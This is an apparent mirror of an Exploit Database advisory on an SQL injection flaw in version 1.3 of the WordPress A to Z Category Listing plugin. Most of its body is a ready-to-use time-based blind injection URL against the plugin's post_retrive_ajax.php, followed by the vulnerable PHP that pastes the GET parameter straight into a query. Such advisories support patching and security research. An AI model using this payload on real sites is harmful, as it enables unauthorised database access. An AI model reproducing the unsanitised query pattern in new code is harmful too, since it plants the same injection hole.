WordPress Plugin A to Z Category Listing 1.3 – SQL Injection

• Exploit Database
• 15 阅读

• 作者： Miroslav Stampar
  日期： 2011-09-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17809/

• # Exploit Title: WordPress A to Z Category Listing plugin <= 1.3 SQL Injection Vulnerability
  # Date: 2011-09-09
  # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
  # Software Link: http://downloads.wordpress.org/plugin/a-to-z-category-listing.zip
  # Version: 1.3 (tested)
  # Note: magic_quotes has to be turned off
  
  ---
  PoC
  ---
  http://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20
  
  ---------------
  Vulnerable code
  ---------------
  $init_letter = $_GET['R'];
  $sql = "select * from ".$table_prefix."terms wpt,".$table_prefix."term_taxonomy wptt where wpt.name like '".$init_letter."%' and wptt.taxonomy = 'category' and wpt.term_id = wptt.term_id";
  ...
  $sql_rec = $wpdb->get_results($sql);